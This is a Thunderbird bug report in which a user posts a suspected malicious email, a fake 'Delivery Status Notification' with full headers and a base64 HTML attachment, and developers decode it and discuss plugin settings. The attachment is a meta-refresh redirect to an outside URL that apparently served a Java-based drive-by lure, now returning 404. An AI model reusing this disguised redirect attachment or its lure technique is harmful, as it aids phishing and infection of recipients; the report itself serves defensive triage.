Closed Bug 578297 Opened 14 years ago Closed 4 months ago

Accidentally opening an email attachment may have infected my computer

Categories

(MailNews Core :: Attachments, defect)

Product:
MailNews Core
Component:
Attachments
Platform:
x86
Windows XP
Type:
defect

Tracking

(Not tracked)

Status:
RESOLVED INVALID

People

(Reporter: jaco, Unassigned)

References

(Blocks 1 open bug)

Details

User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.9.1.9) Gecko/20100317 Thunderbird/3.0.4

Please investigate the email below. Strange things started to happen when the attachment was opened by mistake (some java app started, don't know the rest, I pulled the plug on my computer quickly)


Received: from localhost 
	for <xxxxxxx@xxxxxxx>; Fri,  9 Jul 2010 16:49:53 +0200 (CEST)
X-Virus-Scanned: Debian amavisd-new
Received: from 127.0.0.1
	by localhost 
	with ESMTP id 5gCD+2K-gdkn 
	Fri,  9 Jul 2010 16:49:46 +0200 (CEST)
Received: from vpn29-204.altair-tv.ru (unknown [109.111.19.204])
	by mailserver (Postfix) with ESMTP id 861DB1610356
	for <xxxxx@xxxx.com>; Fri,  9 Jul 2010 16:49:43 +0200 (CEST)
Received: from 109.111.19.204 by mx1.biz.mail.yahoo.com; Fri, 9 Jul 2010 18:44:57 +0300
Date:	Fri, 9 Jul 2010 18:44:57 +0300
From:	Mail Delivery Subsystem 
X-Mailer: The Bat! (v3.62.03) Professional
Reply-To: goulashfs6@rotp.com
X-Priority: 3 (Normal)
Message-ID: <396844352.28219839838582@rotp.com>
To: xxxxxx@xxxxxxx.com
Subject: Delivery Status Notification (Failure)
MIME-Version: 1.0
Content-Type: multipart/mixed;
  boundary="----------B92A869A91FDE80E"

------------B92A869A91FDE80E
Content-Type: text/plain; charset=Windows-1252
Content-Transfer-Encoding: 7bit

Note: Forwarded message is attached.

This is an automatically generated Delivery Status Notification

THIS IS A WARNING MESSAGE ONLY.

Delivery to the following recipient has been delayed:


Message will be retried for 2 more day(s)


------------B92A869A91FDE80E
Content-Type: text/html; name="Forwarded Message.html"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Forwarded Message.html"

PG1ldGEgaHR0cC1lcXVpdj0icmVmcmVzaCIgY29udGVudD0iMDt1cmw9aHR0cDovL2lkaWVwZXJ1
Lm9yZy9pbmRleDMuaHRtbCIgLz4= 

------------B92A869A91FDE80E--



Reproducible: Didn't try
Please tell me Thunderbird doesn't enable Java by default.
Blocks: malware-attacks
Group: core-security
Jesse, is there even a pref for that? Or are you referring to a build-time option?
A new profile created with Lanikai on Mac OS X showed all plugins enabled.
mailnews.message_display.allow.plugins was true? Or plugins rendered content in messages despite that pref's value?
(In reply to comment #3)
> A new profile created with Lanikai on Mac OS X showed all plugins enabled.

The mailnews.message_display.allow.plugins pref should prevent them being used from within the content policy.
So I've just done

Components.classes['@mozilla.org/appshell/window-mediator;1'].getService(Components.interfaces.nsIWindowMediator).getMostRecentWindow("mail:3pane").document.getElementById("tabmail").openTab("contentTab", {contentPage: "http://www.adobe.com/software/flash/about/"});

with mailnews.message_display.allow.plugins false, and that shows me that plugins aren't enabled.

However, I think we're going down the wrong track here.

Per comment 0:

> Please investigate the email below. Strange things started to happen when the
> attachment was opened by mistake (some java app started, don't know the rest, I
> pulled the plug on my computer quickly)

The attachment was *opened* by mistake, and then some java app started.

If this was the attachment being opened (I would guess into Firefox/Other browser) and then that invoked the app or something else, then I'm not sure we can do much about it. Not convinced from the testcase though, opening it as an .eml doesn't seem to do much.
Summary: Possible infection vulnarability? → Accidentally opening an email attachment may have infected my computer
(In reply to comment #0)
> ------------B92A869A91FDE80E
> Content-Type: text/html; name="Forwarded Message.html"
> Content-Transfer-Encoding: base64
> Content-Disposition: attachment; filename="Forwarded Message.html"
> 
> PG1ldGEgaHR0cC1lcXVpdj0icmVmcmVzaCIgY29udGVudD0iMDt1cmw9aHR0cDovL2lkaWVwZXJ1
> Lm9yZy9pbmRleDMuaHRtbCIgLz4= 
> 
> ------------B92A869A91FDE80E--

Decoded HTML.
> <meta http-equiv="refresh" content="0;url=http://idieperu.org/index3.html" />

Data returned from the URL in meta tag today.
> <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
> <html><head>
> <title>404 Not Found</title>
> </head><body>
> <h1>Not Found</h1>
> <p>The requested URL /index3.html was not found on this server.</p>
> <p>Additionally, a 404 Not Found
> error was encountered while trying to use an ErrorDocument to handle the request.</p>
> <hr>
> <address>Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at idieperu.org Port 80</address>
> </body></html>

(In reply to comment #1)
> Please tell me Thunderbird doesn't enable Java by default.

Jesse Ruderman, does it mean that the URL returned HTML data which invoked Java Applet when you accessed?
If so, it may mean idieperu.org was attacked.
The attachment was opened from within Thunderbird by clicking on the attachment logo in the inbox list. I was expecting -my mistake- a thunderbird message window, not something else.

Afterwards I looked at the source of the message, tried to b64decode the attachment, but messed that up so it showed me something binary. That made me wonder and send the bugreport.

But nevertheless, it is too easy to trick people this way. The document index3.html has probably been discovered by idieperu.org and removed.
Component: General → Attachments
Product: Thunderbird → MailNews Core
QA Contact: general → attachments
Severity: normal → S3

per comment 6

Status: UNCONFIRMED → RESOLVED
Closed: 4 months ago
Resolution: --- → INVALID
You need to log in before you can comment on or make changes to this bug.